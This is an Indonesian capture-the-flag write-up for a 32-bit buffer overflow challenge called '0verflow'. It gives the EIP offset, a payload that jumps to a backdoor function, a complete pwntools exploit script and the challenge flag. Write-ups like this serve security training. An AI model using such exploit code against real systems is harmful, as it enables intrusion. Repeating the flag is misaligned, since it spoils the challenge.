# 0verflow

    basic buffer overflow 32bit

## Solusi

cari offset untuk overwrite `eip` dengan menggunakan `gdb`, setelah dapat, rancang
payload untuk `jmp` ke fungsi `backdoor`, yg ada pada alamat `0x80491e9`

    p = "A" * 263
    p += p32(0x80491e9)

gunakan function `p32()` untuk merubah alamat menjadi little endian, lalu kirim payload, 
berikut adalah solver saya untuk meneyelsaikan soal ini

    #!/usr/bin/env python2
    import sys
    from pwn import *
    context.update(arch="i386", endian="little", os="linux", log_level="debug",
                terminal=["tmux", "split-window", "-v", "-p 85"],)
    LOCAL, REMOTE = False, False
    TARGET=os.path.realpath("./bof")
    elf = ELF(TARGET)

    def attach(r):
        if LOCAL:
            bkps = []
            gdb.attach(r, '\n'.join(["break %s"%(x,) for x in bkps]))
        return

    def exploit(r):
        attach(r)
        p = "A" * 263
        p += p32(0x80491e9)
        r.sendline(p)
        r.interactive()
        return

    if __name__ == "__main__":
        if len(sys.argv)==2 and sys.argv[1]=="remote":
            REMOTE = True
            r = remote("127.0.0.1", 1337)
        else:
            LOCAL = True
            r = process([TARGET,])
        exploit(r)
        sys.exit(0)


FLAG: hackfest{buf33r_0verfl0wwwwwuwu}